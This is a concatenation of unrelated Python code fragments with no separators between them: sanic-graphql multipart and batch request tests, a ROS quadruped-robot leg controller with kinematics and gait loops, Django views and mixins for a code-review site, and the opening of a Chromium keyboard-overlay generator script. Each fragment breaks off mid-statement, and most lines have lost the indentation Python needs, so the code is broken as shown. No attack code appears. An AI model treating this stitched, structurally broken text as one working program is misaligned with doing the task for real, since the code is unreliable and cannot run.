assert "data" in res
assert "session" in res["data"]["context"]
assert "request" in res["data"]["context"]
assert "CUSTOM CONTEXT" not in res["data"]["context"]["request"]
assert "Request" in res["data"]["context"]["request"]
@pytest.mark.parametrize("app", [create_app()])
def test_post_multipart_data(app):
query = "mutation TestMutation { writeTest { test } }"
data = (
"------sanicgraphql\r\n"
+ 'Content-Disposition: form-data; name="query"\r\n'
+ "\r\n"
+ query
+ "\r\n"
+ "------sanicgraphql--\r\n"
+ "Content-Type: text/plain; charset=utf-8\r\n"
+ 'Content-Disposition: form-data; name="file"; filename="text1.txt"; filename*=utf-8\'\'text1.txt\r\n'
+ "\r\n"
+ "\r\n"
+ "------sanicgraphql--\r\n"
)
_, response = app.client.post(
uri=url_string(),
data=data,
headers={"content-type": "multipart/form-data; boundary=----sanicgraphql"},
)
assert response.status == 200
assert response_json(response) == {"data": {"writeTest": {"test": "Hello World"}}}
@pytest.mark.parametrize("app", [create_app(batch=True)])
def test_batch_allows_post_with_json_encoding(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg_list(id=1, query="{test}"),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == [{"data": {"test": "Hello World"}}]
@pytest.mark.parametrize("app", [create_app(batch=True)])
def test_batch_supports_post_json_query_with_json_variables(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg_list(
id=1,
query="query helloWho($who: String){ test(who: $who) }",
variables={"who": "Dolly"},
),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == [{"data": {"test": "Hello Dolly"}}]
@pytest.mark.parametrize("app", [create_app(batch=True)])
def test_batch_allows_post_with_operation_name(app):
    _, response
#!/usr/bin/env python
# coding:utf-8
import rospy
import numpy as np
import time
import threading
from math import *
from collections import deque
from settings_new import *
from super_minitaur.msg import *
from std_msgs.msg import *
from scipy.interpolate import interp1d
import matplotlib.pyplot as plt
class LegControl:
def __init__(self,name):
self.name = name + "_leg"
self.control_puber = rospy.Publisher("Odrive/" + name + "/control",LegControlMsg,queue_size=10)
self.para_puber = rospy.Publisher("Odrive/parameter",OdriveParamMsg,queue_size=10)
self.cur_suber = rospy.Subscriber("Odrive/" + name + "/actual_current",FourLegCurrentMsg,self.cur_callback)
self.pos_suber = rospy.Subscriber("Odrive/" + name + "/actual_pos",FourLegPosMsg,self.pos_callback)
self.leg_name = name
self.actual_pos = [0.,-0.25] # [x,y] M
self.actual_vel = [0,0] # [x,y] M
self.t = time.time()
self.actual_cur = [0,0] # [I_M0,I_M1] A
self.actual_motor_angle = [0,0] # [front, rear] rad
self.cur_deque = deque(maxlen=3)
self.pos_x_p = 0.
self.pos_x_d = 0.
self.pos_x_i = 0.
def is_touch(self,thres=25):
        '''
        Test whether the leg is touching the ground: contact is reported when
        either motor current stays consistently (variance < 100) above ``thres``
        over the last three samples.
        '''
self.cur_deque.append(self.actual_cur)
I_M0 = [item[0] for item in self.cur_deque]
I_M1 = [item[1] for item in self.cur_deque]
if np.var(I_M0) < 100 and np.mean(I_M0) > thres:
return 1
if np.var(I_M1) < 100 and np.mean(I_M1) > thres:
return 1
return 0
def WritePosMsg(self,pos):
alpha,beta = InverseForAll(pos[0],pos[1],LEG_LENGTH)
self.control_puber.publish(LegControlMsg(3,0,alpha,beta))
# def CloseLoopPos(self,pos):
# """
    #     Closed-loop control of the end-effector (foot) position, based on current mode
# """
# spin_rate = 0.01
# pos_error_int = np.array(np.zeros(2))
# while :
# pos_estimate = self.actual_pos
# pos_error = np.array(pos) - np.array(pos_estimate)
# pos_error_dt = pos_error / spin_rate
# pos_error_int += pos_error
# force_x = self.pos_x_p * pos_error[0] + self.pos_x_d * pos_error[0] + self.pos_y_i *
def WriteCurMsg(self,cur):
self.control_puber.publish(LegControlMsg(1,0,cur[0],cur[1]))
def Set_para(self,pos_gain = ODRV_POS_GAIN,
vel_gain = ODRV_VEL_GAIN,
vel_integrator_gain = ODRV_VEL_INTEGRATOR_GAIN,
vel_limit = ODRV_VEL_LIMIT,
current_limit = ODRV_CURRENT_LIM):
msg = OdriveParamMsg()
msg.odrive_index = self.leg_name
msg.pos_gain = pos_gain
msg.vel_gain = vel_gain
msg.vel_integrator_gain = vel_integrator_gain
msg.vel_limit = vel_limit
msg.current_limit = current_limit
self.para_puber.publish(msg)
def cur_callback(self,msg):
self.actual_cur = [abs(msg.front_current),abs(msg.rear_current)]
def pos_callback(self,msg):
self.actual_motor_angle = [msg.alpha,msg.beta]
        # forward kinematics
alpha = -msg.alpha
beta = -msg.beta
theta1 = (alpha+beta)/2
theta2 = (alpha-beta)/2
l1 = LEG_LENGTH[0]
l2 = LEG_LENGTH[1]
L = -l1*sin(theta1)+sqrt(pow(l2,2)-pow(l1,2)*pow(cos(theta1),2))
x = L * sin(theta2)
y = - L * cos(theta2)
theta3 = theta2 + asin(l1 * cos(theta1) / l2)
# theta3 = theta2 - asin(l1 * cos(theta1) / l2)
x = x + DELTA_L2 * sin(theta3)
y = y - DELTA_L2 * cos(theta3)
vel = self.actual_vel
self.actual_vel =(np.array([x,y])-self.actual_pos)/(time.time()-self.t)
self.actual_acc =(self.actual_vel-vel)/(time.time()-self.t)
self.actual_pos = [x,y]
self.t = time.time()
def leg_length(self):
return sqrt(pow(self.actual_pos[0], 2) + pow(self.actual_pos[1], 2))
def leg_squat(self,squat_pos=np.array([0,-0.27])):
t = 0
T = 0.1
spin_rate = 0.05
while t<T:
xs = (-self.actual_pos[0] + squat_pos[0])*t/T+self.actual_pos[0]
ys = (-self.actual_pos[1] + squat_pos[1])*t/T+self.actual_pos[1]
self.WritePosMsg([xs,ys])
t+=spin_rate
# time.sleep(spin_rate)
def leg_check(self,index,ADJUST_OFFSET=[-0.01,-0.01,-0.01,-0.01],ADJUST_HEIGHT=-0.25,step_height=0.03):
if abs(self.actual_pos[0]-ADJUST_OFFSET[index])>0.02 or abs(self.actual_pos[1]-ADJUST_HEIGHT)>0.02:
self.WritePosMsg([ADJUST_OFFSET[index],ADJUST_HEIGHT+step_height])
time.sleep(0.02)
self.WritePosMsg([ADJUST_OFFSET[index],ADJUST_HEIGHT])
return 1
return 0
def InverseForAll(x_f, y_f, LEG_LENGTH):  # x_f, y_f: coordinates of the foot sphere center
    C1 = pow(x_f,2) + pow(y_f,2) + pow(LEG_LENGTH[0],2) - pow((LEG_LENGTH[1]+DELTA_L2),2)  # intermediate constant
A = 1 + pow(x_f,2) / pow(y_f,2)
B = -C1 * x_f / pow(y_f,2)
C = pow(C1,2) / (4 * pow(y_f,2)) - pow(LEG_LENGTH[0],2)
x_knee = (-B - sqrt(pow(B,2) - 4*A*C))/(2 * A)
# x_knee = (-B + sqrt(pow(B,2) - 4*A*C))/(2 * A)
y_knee = (C1 - 2*x_f*x_knee)/(2*y_f)
scall = (DELTA_L2) / (LEG_LENGTH[1] + DELTA_L2)
x = x_f + (x_knee-x_f)*scall
y = y_f + (y_knee-y_f)*scall
    # from here on, x and y are the ankle-joint coordinates
x = -x
l1 = LEG_LENGTH[0]
l2 = LEG_LENGTH[1]
L = sqrt(x*x+y*y)
psi = asin(x/L)
phi = acos((l1*l1+L*L-l2*l2)/(2*l1*L))
theta1 = phi - psi
theta2 = phi + psi
alpha = pi/2 - theta1
beta = pi/2 - theta2
return alpha, beta
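# A minimal, hypothetical sanity check (not called anywhere): run the inverse
# kinematics, then push the resulting motor angles through the same forward
# kinematics used in LegControl.pos_callback, and print the reconstruction.
# It assumes LEG_LENGTH and DELTA_L2 are provided by settings_new.
def _demo_kinematics_roundtrip(x_f=0.03, y_f=-0.25):
    alpha_cmd, beta_cmd = InverseForAll(x_f, y_f, LEG_LENGTH)
    # the forward kinematics mirrors pos_callback, where motor angles are negated
    alpha, beta = -alpha_cmd, -beta_cmd
    theta1 = (alpha + beta) / 2
    theta2 = (alpha - beta) / 2
    l1, l2 = LEG_LENGTH[0], LEG_LENGTH[1]
    L = -l1 * sin(theta1) + sqrt(pow(l2, 2) - pow(l1, 2) * pow(cos(theta1), 2))
    theta3 = theta2 + asin(l1 * cos(theta1) / l2)
    x = L * sin(theta2) + DELTA_L2 * sin(theta3)
    y = -L * cos(theta2) - DELTA_L2 * cos(theta3)
    print("target:", (x_f, y_f), "reconstructed:", (x, y))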
class minitaur:
def __init__(self):
rospy.init_node('super_control',anonymous=True)
self.LegControllers = [LegControl("RF"),
LegControl("RB"),
LegControl("LF"),
LegControl("LB")]
self.imu_suber = rospy.Subscriber("super_minitaur/imu_data",ImuMsg,self.imu_callback)
self.state_suber = rospy.Subscriber("super_minitaur/state_change",String,self.state_callback)
self.Euler = [0,0,0]
self.Init()
self.state = 'IDLE'
self.run()
def Init(self):
print("Waiting for Odrive")
while rospy.get_param('Odrive_ready_flag') == 0:
time.sleep(0.1)
print("Odrive is Ready")
def imu_callback(self,msg):
self.Euler = [msg.yaw,
msg.pitch,
msg.roll]
def state_callback(self,msg):
self.state = msg.data
DEFAULT_POS = [[[0.03,-0.25],
[-0.03,-0.25],
[0.03,-0.25],
[-0.03,-0.25]]]
def MoveLegsP2P(self,target_pos= DEFAULT_POS ,run_time = 0.5,frequency = 40):
        '''
        Move all four legs from their current positions through the given
        keyframes, publishing `frequency` interpolated position commands over
        `run_time` seconds (run_time must be a float).
        target_pos = [ [[x1,y1],[x2,y2],[x3,y3],[x4,y4]],
                       [[x1,y1],[x2,y2],[x3,y3],[x4,y4]],
                       .... ]
        '''
run_time = float(run_time)
target_pos_temp = list(target_pos)
if len(target_pos_temp) == 0:
rospy.logerr("target_pos is empty!")
return -1
if len(target_pos_temp) == 1:
mode = 'linear'
else:
mode = 'cubic'
target_pos_temp.insert(0,[leg.actual_pos for leg in self.LegControllers])
#target_pos_temp = [ [[x1,y1],[x2,y2],[x3,y3],[x4,y4]], actual pos
# [[x1,y1],[x2,y2],[x3,y3],[x4,y4]],
# [[x1,y1],[x2,y2],[x3,y3],[x4,y4]],
# .... ]
x = [[item[i][0] for item in target_pos_temp] for i in range(4)]
y = [[item[i][1] for item in target_pos_temp] for i in range(4)]
#x = [[x1,x1,x1,x1...],[x2,x2,x2,x2...],[x3,x3,x3,x3...],[x4,x4,x4,x4...]]
# functs = [interp1d(x[i],y[i],kind = mode) for i in range(4)]
functs = [0, 0, 0, 0]
for i in range(4):
if (x[i].count(x[i][1]) >= len(x[i]) - 1 or y[i].count(y[i][1]) >= len(y[i]) - 1):
functs[i] = interp1d(x[i], y[i], kind='linear')
else:
functs[i] = interp1d(x[i], y[i], kind=mode)
#functs = [f1,f2,f3,f4]
xxs = [np.linspace(target_pos_temp[0][i][0],
target_pos_temp[-1][i][0], frequency) for i in range(4)]
#xxs = [[x1,x1,x1,x1...],[x2,x2,x2,x2...],[x3,x3,x3,x3...],[x4,x4,x4,x4...]]
yys = [functs[i](xxs[i]) for i in range(4)]
        #yys = [[y1,y1,y1,y1...],[y2,y2,y2,y2...],[y3,y3,y3,y3...],[y4,y4,y4,y4...]]
for i in range(int(frequency)):
for index,leg in enumerate(self.LegControllers):
pos = [xxs[index][i],yys[index][i]]
leg.WritePosMsg(pos)
            # print(self.LegControllers[2].is_touch(thres=15))
time.sleep(run_time/frequency)
def run(self):
while not rospy.is_shutdown():
if self.state == 'SQUAT':
self.Squat()
if self.state == 'TRIAL1':
self.Trial1()
if self.state == 'TRIAL2':
self.Trial2()
if self.state == 'TRIAL3':
self.Trial3()
if self.state == 'TRIAL4':
self.Trial4()
if self.state == 'TROT':
self.Trot()
if self.state == 'TROT_IN_PLACE':
self.Trot_in_place()
if self.state == 'CRAWL':
self.Crawl()
if self.state == 'TURN':
self.Turn()
if self.state == 'JUMP':
self.JumpCurrent()
if self.state == 'TEST':
t = time.time()
for i in range(1000):
print(self.Euler)
print(time.time()-t)
self.state = 'IDLE'
if self.state == 'ADJUST':
self.Adjust()
if self.state == 'UPSLOPE':
self.Upslope()
if self.state == 'ZERO':
self.ZeroForceControl(self.LegControllers[3])
time.sleep(0.1)
def Adjust(self,offset=[0.03,-0.03,0.03,-0.03]):
flag=[1,1,1,1]
while sum(flag):
for index, leg in enumerate(self.LegControllers):
flag[index]=leg.leg_check(index,offset)
time.sleep(0.1)
print(flag)
print('FINISH')
self.state = 'IDLE'
def PID_test(self):
PID = [np.array([270, 240]), np.array([10, 8]), np.array([20, 20])]
leg = self.LegControllers[3]
posErrSum = 0.
theo_acc = np.array([0, 0])
theo_pos = leg.actual_pos + np.array([0.05, 0.])
theo_vel = np.array([0.,0.])
t = time.time()
rate = 0.0025
xs = []
ys = []
T=1
old_time = time.time()
while time.time()-t<T:
xs.append(leg.actual_pos[0])
ys.append(leg.actual_pos[1])
posErrSum += (theo_pos-leg.actual_pos)*(time.time() - old_time)
old_time = time.time()
force = PID[0]*(theo_pos-leg.actual_pos)+PID[1]*(theo_vel-leg.actual_vel)+PID[2]*posErrSum+theo_acc
self.WriteForce(leg, force)
time.sleep(rate)
print (theo_pos - leg.actual_pos)
self.WriteForce(leg, [0, 0])
ts = np.linspace(0, T, len(xs))
plt.plot(ts, xs, 'b')
# plt.plot(ts, ys, 'r')
plt.show()
self.state = "IDLE"
def PIDControl(self,T,x,y,x_,y_):
PID = [np.array([270, 240]), np.array([10, 8]), np.array([20, 20])]
leg = self.LegControllers[3]
posErrSum = 0.
theo_acc = np.array([0, 0])
theo_pos = np.array([x,y])
theo_vel = np.array([x_, y_])
t = time.time()
rate = 0.0025
old_time = time.time()
while time.time()-t<T:
posErrSum += (theo_pos-leg.actual_pos)*(time.time() - old_time)
old_time = time.time()
force = PID[0]*(theo_pos-leg.actual_pos)+PID[1]*(theo_vel-leg.actual_vel)+PID[2]*posErrSum+theo_acc
self.WriteForce(leg, force)
time.sleep(rate)
def Circle_test(self):
t=0
T=2.5
spin_rate=0.01
a = 0.05
leg=self.LegControllers[3]
offset=leg.actual_pos
xs = []
ys = []
xs_theo = []
ys_theo = []
while t<T:
xs.append(leg.actual_pos[0])
ys.append(leg.actual_pos[1])
x = a*sin(2*pi*t/T)+offset[0]
y = a*cos(2*pi*t/T)+offset[1]
xs_theo.append(x)
ys_theo.append(y)
x_ = 0.75*a*2*pi/T*cos(2*pi*t/T)
y_ = -0.75*a*2*pi/T*sin(2*pi*t/T)
self.PIDControl(spin_rate,x,y,x_,y_)
t = t+spin_rate
self.LegControllers[3].WriteCurMsg([0, 0])
self.state = 'IDLE'
plt.plot(xs, ys, 'b')
plt.plot(xs_theo, ys_theo, 'r')
plt.show()
def Squat(self):
self.MoveLegsP2P(target_pos=[[[STAND_OFFSET[i], SQUAT_HEIGHT] for i in range(4)]],run_time=0.5,frequency=40)
self.state = 'IDLE'
def Trot(self):
T = 0.5
t1 = T/6.0
t2 = T/6.0*5
step_length = 0.1
min_height = -0.24
step_height_up = 0.04
step_height_down = 0.02
spin_rate = 0.01
t = 0.0
TROT_OFFSET = [0.03, -0.03, 0.03, -0.03]
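        # Gait structure: each cycle of period T spends t1 = T/6 in swing
        # (foot lifted along a half-sine of height step_height_up while moving
        # forward) and t2 = 5T/6 in stance (foot pressed down by
        # step_height_down while moving backward). Legs 0/3 and 1/2 form
        # diagonal pairs, phase-shifted by T/2 relative to each other.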
for index,leg in enumerate(self.LegControllers):
leg.Set_para(pos_gain = 60, vel_gain = 0.001)
self.MoveLegsP2P(target_pos=[[[TROT_OFFSET[0],min_height], [-step_length/2,min_height],
[TROT_OFFSET[0],min_height], [-step_length/2,min_height]]],run_time=0.5,frequency=40)
while not rospy.is_shutdown():
t = t%T
if t < t1:
xs = t/t1*step_length-step_length/2
ys = step_height_up*sin(t/t1*pi)+min_height
self.LegControllers[0].WritePosMsg([xs+TROT_OFFSET[0], ys])
self.LegControllers[3].WritePosMsg([xs+TROT_OFFSET[1], ys])
elif (t - t1) < t2:
xs = -(t-t1)/t2*step_length+step_length/2
ys = step_height_down*-sin((t-t1)/t2*pi)+min_height
self.LegControllers[0].WritePosMsg([xs+TROT_OFFSET[0], ys])
self.LegControllers[3].WritePosMsg([xs+TROT_OFFSET[1], ys])
t_other = t+T/2
t_other=t_other%T
if t_other < t1:
xs = t_other/t1*step_length-step_length/2
ys = step_height_up*sin(t_other/t1*pi)+min_height
self.LegControllers[1].WritePosMsg([xs+TROT_OFFSET[1], ys])
self.LegControllers[2].WritePosMsg([xs+TROT_OFFSET[0], ys])
elif (t_other-t1) < t2:
xs = -(t_other-t1)/t2*step_length+step_length/2
ys = step_height_down*-sin((t_other-t1)/t2*pi)+min_height
self.LegControllers[1].WritePosMsg([xs+TROT_OFFSET[1], ys])
self.LegControllers[2].WritePosMsg([xs+TROT_OFFSET[0], ys])
t += spin_rate
time.sleep(spin_rate)
if self.state != 'TROT':
break
def Upslope(self):
T = 0.5
t1 = T/6.0
t2 = T/6.0*5
step_length = 0.05
min_height = -0.25
step_height_up = 0.03
step_height_down = 0.02
spin_rate = 0.01
t = 0.0
TROT_OFFSET = [-0.0, -0.0, -0.0, -0.0]
self.Adjust(TROT_OFFSET)
self.state = 'UPSLOPE'
while not rospy.is_shutdown():
x_offset = 1.2*min_height*tan(self.Euler[1]/180*pi)
print(t)
print(x_offset)
t = t%T
if t < t1:
xs = t/t1*step_length-step_length/2+x_offset
ys = step_height_up*sin(t/t1*pi)+min_height
self.LegControllers[0].WritePosMsg([xs+TROT_OFFSET[0], ys])
self.LegControllers[3].WritePosMsg([xs+TROT_OFFSET[1], ys])
elif (t - t1) < t2:
xs = -(t-t1)/t2*step_length+step_length/2+x_offset
ys = step_height_down*-sin((t-t1)/t2*pi)+min_height
self.LegControllers[0].WritePosMsg([xs+TROT_OFFSET[0], ys])
self.LegControllers[3].WritePosMsg([xs+TROT_OFFSET[1], ys])
t_other = t+T/2
t_other=t_other%T
if t_other < t1:
xs = t_other/t1*step_length-step_length/2+x_offset
ys = step_height_up*sin(t_other/t1*pi)+min_height
self.LegControllers[1].WritePosMsg([xs+TROT_OFFSET[1], ys])
self.LegControllers[2].WritePosMsg([xs+TROT_OFFSET[0], ys])
elif (t_other-t1) < t2:
xs = -(t_other-t1)/t2*step_length+step_length/2+x_offset
ys = step_height_down*-sin((t_other-t1)/t2*pi)+min_height
self.LegControllers[1].WritePosMsg([xs+TROT_OFFSET[1], ys])
"""
This file defines backend code that runs when a user visits a page
"""
from datetime import datetime
from typing import Optional
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.core import mail
from django.db.models import Q, QuerySet
from django.forms import Form
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import redirect, render
from django.template.loader import render_to_string
from django.urls import reverse_lazy
from django.views import View
from django.views.generic import TemplateView, CreateView, UpdateView, DeleteView, DetailView, ListView
from django.views.generic.base import ContextMixin
from django.views.generic.edit import FormMixin, DeletionMixin
from Users.models import User
from . import models, forms
# Email Utility Functions
def send_email(subject_template: str, text_template: str, template_name: str, review: models.Review,
query_set: QuerySet):
"""
This function sends an email to a group of users
:param subject_template: Defines what the subject of the email will be
:type subject_template: str
:param text_template: Defines what the text content will be
:type text_template: str
:param template_name: Defines what template to use for the html content of the email
:type template_name: str
:param review: The Review this email pertains to
:type review: models.Review
:param query_set: The QuerySet of users to send the email to
:type query_set: QuerySet
"""
for user in list(query_set.filter(receive_notifications=True)):
html_content = render_to_string(template_name, {'target_user': user, 'review': review})
text_content = text_template.format(target_user=str(user), student=str(review.student),
reviewer=str(review.reviewer))
subject = subject_template.format(target_user=str(user), student=str(review.student),
reviewer=str(review.reviewer))
message = mail.EmailMultiAlternatives(subject=f'{review.student.session} | {subject}', body=text_content)
message.attach_alternative(html_content, "text/html")
message.to = [user.email]
message.send()
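# Hypothetical usage sketch (mirroring the call in ReviewCreateView.form_valid
# below): notify every reviewer in the student's session about a new review.
#
#   send_email("Review created by {student}",
#              "Hello {target_user}, a new review has been created by {student}",
#              "emails/review_created.html",
#              review,
#              User.objects.filter(is_reviewer=True, session=review.student.session))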
# Mixins
"""
These mixins provide common functionality to Views
"""
class IsSuperUserMixin(UserPassesTestMixin):
"""
This Mixin ensures the user is an admin (instructor)
"""
request = None
def test_func(self) -> bool:
"""
This is the function run to test the user
:returns: The user's superuser status
:rtype: bool
"""
return self.request.user.is_superuser
class IsReviewerMixin(UserPassesTestMixin):
"""
This Mixin ensures the user is a reviewer
"""
request = None
def test_func(self) -> bool:
"""
This is the function run to test the user
:returns: The user's reviewer status
:rtype: bool
"""
return self.request.user.is_reviewer
class FormNameMixin(ContextMixin):
"""
This Mixin lets Views set a "Form name" to be used in form_base.html
:cvar form_name: The name of the form to display in the pageHeader block
"""
form_name = "Form"
def get_context_data(self, **kwargs) -> dict[str, object]:
"""
This function is run to get additional context data to pass to the template
:returns: Additional context to pass to the template
:rtype: dict
"""
context = super(FormNameMixin, self).get_context_data(**kwargs)
context['formName'] = self.form_name
return context
class FormAlertMixin(FormMixin):
"""
This Mixin lets Forms display success and error messages
:cvar success_message: The message to show when the form is valid
:cvar failure_message: The message to show in the event of an error
"""
request = None
success_message: str = "Complete"
failure_message: str = "The information you provided was incorrect, please correct the errors described below"
def form_valid(self, form) -> HttpResponse:
"""
This function is run when the form is valid.
It adds the success message to the messages framework
:param form: The form that is valid
"""
if self.success_message is not None:
messages.add_message(self.request, messages.SUCCESS, self.success_message)
return super(FormAlertMixin, self).form_valid(form)
def form_invalid(self, form: Form) -> HttpResponse:
"""
This function is run when the form is invalid.
It adds the failure message to the messages framework
:param form: The form that is invalid
"""
if len(form.non_field_errors()) > 0:
for error in form.non_field_errors():
messages.add_message(self.request, messages.ERROR, error)
else:
messages.add_message(self.request, messages.ERROR, self.failure_message)
return super(FormAlertMixin, self).form_invalid(form)
class SuccessDeleteMixin(DeletionMixin):
"""
This Mixin lets Views show a message after a deletion is complete.
:cvar success_message: The message to be displayed when something is deleted successfully.
"""
success_message: str = "Deleted"
request = None
def form_valid(self, form) -> HttpResponse:
"""
This function is run when the deletion has been confirmed by the user.
It adds the success message to the messages framework.
"""
messages.add_message(self.request, messages.SUCCESS, self.success_message)
return super(SuccessDeleteMixin, self).delete(self.request)
# Home
class HomeView(LoginRequiredMixin, TemplateView):
"""
This view is shown when the User goes to the root of the site.
:cvar template_name: The template to render
"""
template_name = "home.html"
def get(self, *args, **kwargs) -> HttpResponse:
"""
This function is run when the user makes a GET request.
It redirects the user to the instructor homepage if they're an instructor.
"""
if self.request.user.email is None or self.request.user.email == "":
return redirect('user-setup', pk=self.request.user.id)
else:
if self.request.user.is_superuser:
return redirect('instructor-home')
else:
return super(HomeView, self).get(*args, **kwargs)
def get_context_data(self, **kwargs) -> dict[str, object]:
"""
This function gives additional context data to the template.
It gives a list of Reviews related to the user.
:returns: Additional context data for the template
:rtype: dict
"""
context = super(HomeView, self).get_context_data(**kwargs)
user: User = self.request.user
context['active'] = models.Review.objects.filter(student=user).exclude(status=models.Review.Status.CLOSED)
context['completed'] = models.Review.objects.filter((Q(student=user) | Q(reviewer=user))
& Q(status=models.Review.Status.CLOSED))
if user.is_reviewer:
rubrics = models.Review.objects.exclude(status=models.Review.Status.CLOSED).filter(
Q(status=models.Review.Status.OPEN, ) | Q(status=models.Review.Status.ASSIGNED, reviewer=user)
)
context['open'] = rubrics.filter(status=models.Review.Status.OPEN, student__session=user.session).exclude(
student=user)
context['assigned'] = rubrics.filter(status=models.Review.Status.ASSIGNED)
return context
# Reviews
class ReviewCreateView(LoginRequiredMixin, FormNameMixin, FormAlertMixin, CreateView):
"""
This view is used to create (request) a code review
:cvar template_name: The name of the template to render
:cvar success_url: The URL to go to if the creation was successful
:cvar model: The model to create an object for
:cvar form_class: The class of the Form to use
:cvar form_name: The name to put in the pageHeader block
:cvar success_message: The message to display when the creation is successful
"""
template_name = 'form_base.html'
success_url = reverse_lazy('home')
model = models.Review
form_class = forms.ReviewForm
form_name = "Create a Review"
success_message = "New Review Saved"
def get_context_data(self, **kwargs) -> dict[str, object]:
"""
This function defines additional context data to pass to the template
"""
context = super(ReviewCreateView, self).get_context_data(**kwargs)
context['render_no_floating'] = True
return context
def get_form_kwargs(self) -> dict[str, object]:
"""
This function defines additional kwargs to pass to the form's constructor
We give the user object so the Form can save the Review correctly
:returns: Additional kwargs to pass to the Form's constructor
:rtype: dict
"""
kwargs = super().get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
def form_valid(self, form) -> HttpResponse:
"""
This function is run when the form has been submitted and is valid
It sends an email to all Reviewers telling them about the new Review
"""
response = super(ReviewCreateView, self).form_valid(form)
send_email("Review created by {student}",
"Hello {target_user}, a new review has been created by {student}",
"emails/review_created.html",
self.object,
User.objects.filter(is_reviewer=True, session=self.request.user.session).exclude(
id=self.request.user.id))
return response
class ReviewEditView(LoginRequiredMixin, FormNameMixin, FormAlertMixin, UpdateView):
"""
This view is used to edit a code review
:cvar template_name: The name of the template to render
:cvar success_url: The URL to go to if the edit was successful
:cvar model: The model to edit an object for
:cvar form_class: The class of the form to render
:cvar form_name: The name to put in the pageHeader block
:cvar success_message: The message to display when the edit is successful
"""
template_name = 'form_base.html'
success_url = reverse_lazy('home')
model = models.Review
form_class = forms.ReviewForm
form_name = "Edit Review"
success_message = "Review Updated"
def get_queryset(self) -> QuerySet:
"""
This function defines which Reviews a user can edit
It only lets you edit a review in which you are the student, and it's not graded
:return: A QuerySet defining which Reviews can be edited by this user
:rtype: QuerySet
"""
return models.Review.objects.filter(student=self.request.user).exclude(status=models.Review.Status.CLOSED)
class ReviewCancelView(LoginRequiredMixin, SuccessDeleteMixin, DeleteView):
"""
This view is used to cancel a Review.
This is used by the *student* when they want to cancel a Review before it's done
:cvar template_name: The template to render
:cvar success_url: The URL to redirect to once the Review has been cancelled
:cvar model: The model that will be deleted
:cvar success_message: The message to display when the Review has been cancelled
"""
template_name = 'reviews/review_cancel.html'
success_url = reverse_lazy('home')
model = models.Review
success_message = "Review Cancelled"
def get_context_data(self, **kwargs) -> dict[str, object]:
"""
This function provides additional context data to the template
:returns: Additional context to pass to the template
:rtype: dict
"""
context = super(ReviewCancelView, self).get_context_data(**kwargs)
context['objectString'] = f"review with schoology id: {self.object.schoology_id}"
return context
def get_queryset(self) -> QuerySet:
"""
This function defines what Reviews the user can cancel
It limits it to the Reviews where the user is the student and Reviews that aren't closed
:returns: A QuerySet of Reviews the user can edit
:rtype: QuerySet
"""
return models.Review.objects.filter(student=self.request.user).exclude(status=models.Review.Status.CLOSED)
class
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generate keyboard layout and hotkey data for the keyboard overlay.
This script fetches data from the keyboard layout and hotkey data spreadsheet,
and output the data depending on the option.
--cc: Rewrites a part of C++ code in
chrome/browser/chromeos/webui/keyboard_overlay_ui.cc
--grd: Rewrites a part of grd messages in
chrome/app/generated_resources.grd
--js: Rewrites the entire JavaScript code in
chrome/browser/resources/keyboard_overlay/keyboard_overlay_data.js
These options can be specified at the same time.
e.g.
python gen_keyboard_overlay_data.py --cc --grd --js
The output directory of the generated files can be changed with --outdir.
e.g. (This will generate tmp/keyboard_overlay.js)
python gen_keyboard_overlay_data.py --outdir=tmp --js
"""
import cStringIO
import datetime
import gdata.spreadsheet.service
import getpass
import json
import optparse
import os
import re
import sys
MODIFIER_SHIFT = 1 << 0
MODIFIER_CTRL = 1 << 1
MODIFIER_ALT = 1 << 2
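# These masks can be OR-ed together to describe a chord, e.g. Ctrl+Shift is
# MODIFIER_SHIFT | MODIFIER_CTRL == 3.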
KEYBOARD_GLYPH_SPREADSHEET_KEY = '<KEY>'
HOTKEY_SPREADSHEET_KEY = '<KEY>'
CC_OUTDIR = 'chrome/browser/ui/webui/chromeos'
CC_FILENAME = 'keyboard_overlay_ui.cc'
GRD_OUTDIR = 'chrome/app'
GRD_FILENAME = 'chromeos_strings.grdp'
JS_OUTDIR = 'chrome/browser/resources/chromeos'
JS_FILENAME = 'keyboard_overlay_data.js'
CC_START = r'IDS_KEYBOARD_OVERLAY_INSTRUCTIONS_HIDE },'
CC_END = r'};'
GRD_START = r' <!-- BEGIN GENERATED KEYBOARD OVERLAY STRINGS -->'
GRD_END = r' <!-- END GENERATED KEYBOARD OVERLAY STRINGS -->'
LABEL_MAP = {
'glyph_arrow_down': 'down',
'glyph_arrow_left': 'left',
'glyph_arrow_right': 'right',
'glyph_arrow_up': 'up',
'glyph_back': 'back',
'glyph_backspace': 'backspace',
'glyph_brightness_down': 'bright down',
'glyph_brightness_up': 'bright up',
'glyph_enter': 'enter',
'glyph_forward': 'forward',
'glyph_fullscreen': 'full screen',
# Kana/Eisu key on Japanese keyboard
'glyph_ime': u'\u304b\u306a\u0020\u002f\u0020\u82f1\u6570',
'glyph_lock': 'lock',
'glyph_overview': 'switch window',
'glyph_power': 'power',
'glyph_right': 'right',
'glyph_reload': 'reload',
'glyph_search': 'search',
'glyph_shift': 'shift',
'glyph_tab': 'tab',
'glyph_tools': 'tools',
'glyph_volume_down': 'vol. down',
'glyph_volume_mute': 'mute',
'glyph_volume_up': 'vol. up',
};
INPUT_METHOD_ID_TO_OVERLAY_ID = {
'xkb:be::fra': 'fr',
'xkb:be::ger': 'de',
'xkb:be::nld': 'nl',
'xkb:bg::bul': 'bg',
'xkb:bg:phonetic:bul': 'bg',
'xkb:br::por': 'pt_BR',
'xkb:ca::fra': 'fr_CA',
'xkb:ca:eng:eng': 'ca',
'xkb:ch::ger': 'de',
'xkb:ch:fr:fra': 'fr',
'xkb:cz::cze': 'cs',
'xkb:de::ger': 'de',
'xkb:de:neo:ger': 'de_neo',
'xkb:dk::dan': 'da',
'xkb:ee::est': 'et',
'xkb:es::spa': 'es',
'xkb:es:cat:cat': 'ca',
'xkb:fi::fin': 'fi',
'xkb:fr::fra': 'fr',
